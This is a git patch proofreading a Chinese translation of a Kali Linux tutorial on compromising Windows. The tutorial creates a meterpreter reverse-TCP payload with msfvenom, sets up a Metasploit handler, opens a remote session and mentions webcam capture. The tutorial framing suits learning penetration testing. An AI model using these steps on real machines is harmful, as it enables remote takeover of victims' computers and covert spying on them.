From 09881a99f84b40e2672e817412a36ecf88bd6386 Mon Sep 17 00:00:00 2001 From: wxy Date: Fri, 10 Feb 2017 22:41:29 +0800 Subject: [PATCH] PRF:20170207 How To hack windows with Kali Linux @GHLandy --- ...207 How To hack windows with Kali Linux.md | 48 ++++++++++--------- 1 file changed, 25 insertions(+), 23 deletions(-) diff --git a/translated/tech/20170207 How To hack windows with Kali Linux.md b/translated/tech/20170207 How To hack windows with Kali Linux.md index b9d29a0773..3607de8503 100644 --- a/translated/tech/20170207 How To hack windows with Kali Linux.md +++ b/translated/tech/20170207 How To hack windows with Kali Linux.md @@ -1,10 +1,9 @@ -快速指南:如何使用 Kali Linux 黑掉 Windows +如何使用 Kali Linux 黑掉 Windows ==================== -Kali Linux 源自于 Debian Linux,主要用于渗透测试,拥有超过 300 套的预安装渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全 exploit 代码的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦。 +Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具。Metasploit 项目中 Metasploit 框架支持 Kali Linux 平台,Metasploit 是一个用于开发和执行安全利用代码(security exploit)的工具。让我们来使用 Kali Linux 来攻破 Windows 吧。请注意,我写这篇文章只是出于教育目的哦——一切因此带来的后果和本文作者、译者无关。 - -源机器详情: +### 源机器详情 Kali Linux @@ -20,9 +19,9 @@ root@kali:/# Windows 7 Ultimate SP1 ``` -步骤 1:创建 Payload 程序 +### 步骤 1:创建 Payload 程序 -Payload 是一个类似于病毒 (virus) 或者木马 (trojan) 的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload,以便能使用 Kali Linux 黑掉 Windows。 +Payload 是一个类似于病毒或者木马的程序,可以运行在远程目标上 —— 为了黑掉那台机器。可以通过以下命令来创建 Payload(`program.exe`),以便能使用 Kali Linux 黑掉 Windows。 ``` root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe @@ -36,9 +35,9 @@ root@kali:/# ls -la /root/program.exe -rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe ``` -通过 'ls' 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。 +通过 `ls` 命令,我们可以确认 Payload 程序是否成功生成在指定的位置。 -步骤 2:运行 mfsconsole 命令启动 msf 命令窗口 +### 步骤 2:运行 `mfsconsole` 命令启动 msf 命令窗口 ``` root@kali:# msfconsole @@ -77,10 +76,10 @@ your progress and findings -- learn more on http://rapid7.com/metasploit msf > ``` -步骤 3:我使用一下细节进行漏洞利用 (exploiting) +### 步骤 3:进行漏洞利用的细节 -* 4444 端口:你可用按照自己的心意来使用哪个端口 -* LHOST IP:表示 Kali Linux 机器的IP 192.168.189.128\. 使用如下命令来查看你的 Kali Linux 机器的 IP。 +* 4444 端口:你可以按照自己的想法来选择使用哪个端口 +* LHOST IP:表示 Kali Linux 机器的 IP,这里是 192.168.189.128。 使用如下命令来查看你的 Kali Linux 机器的 IP。 ``` root@kali:/# ip r l @@ -88,27 +87,30 @@ root@kali:/# ip r l root@kali:/# ``` -现在在 msf 命令窗口使用 “use exploit/multi/handler” 命令,如下: +现在在 msf 命令窗口使用 `use exploit/multi/handler` 命令,如下: ``` msf > use exploit/multi/handler msf exploit(handler) > ``` -然后在接下来的命令窗口中使用命令 “set payload windows/meterpreter/reverse_tcp”: -``` -msf exploit(handler) > set payload windows/meterpreter/reverse_tcp -payload => windows/meterpreter/reverse_tcp -``` - -现在使用 LHOST 和 LPORT 来存储本地 IP 和本地端口,如下: +然后在接下来的命令窗口中使用命令 `set payload windows/meterpreter/reverse_tcp`: ``` msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp ``` -最后使用 exploit 命令。 +现在使用 LHOST 和 LPORT 来设置本地 IP 和本地端口,如下: + +``` +msf exploit(handler) > set lhost 192.168.189.128 +lhost => 192.168.189.128 +msf exploit(handler) > set lport 4444 +lport => 4444 +``` + +最后使用 `exploit` 命令。 ``` msf exploit(handler) > exploit @@ -117,7 +119,7 @@ msf exploit(handler) > exploit [*] Starting the payload handler... ``` -现在你需要在 Windows 上运行 “program.exe”,一旦他在目标机器上执行,你就可以建立一个 meterpreter 会话。输入 sysinfo 就可以得到被黑掉的 Windows 机器详情。 +现在你需要在 Windows 上运行 `program.exe`,一旦它在目标机器上执行,你就可以建立一个 meterpreter 会话。输入 `sysinfo` 就可以得到这台被黑掉的 Windows 机器的详情。 ``` msf exploit(handler) > exploit @@ -137,7 +139,7 @@ Logged On Users : 2 Meterpreter : x86/win32 ``` -一旦你得到了这下详细信息,就可以做更多的漏洞利用,或者通过 “help” 命令获取更多信息,以便列出所有你可以黑掉该系统的选项,比如 “webcam_snap” 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!! +一旦你得到了这些详细信息,就可以做更多的漏洞利用,或者通过 `help` 命令获取更多信息,以便列出你可以黑掉该系统的所有选项,比如 `webcam_snap` 命令获取网络摄像头,同样你还可以使用其他更多的可用选项。祝你入侵愉快!!!! ←_← ------------------------------------ @@ -151,7 +153,7 @@ via: http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/ 作者:[Manmohan Mirkar][a] 译者:[GHLandy](https://github.com/GHLandy) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出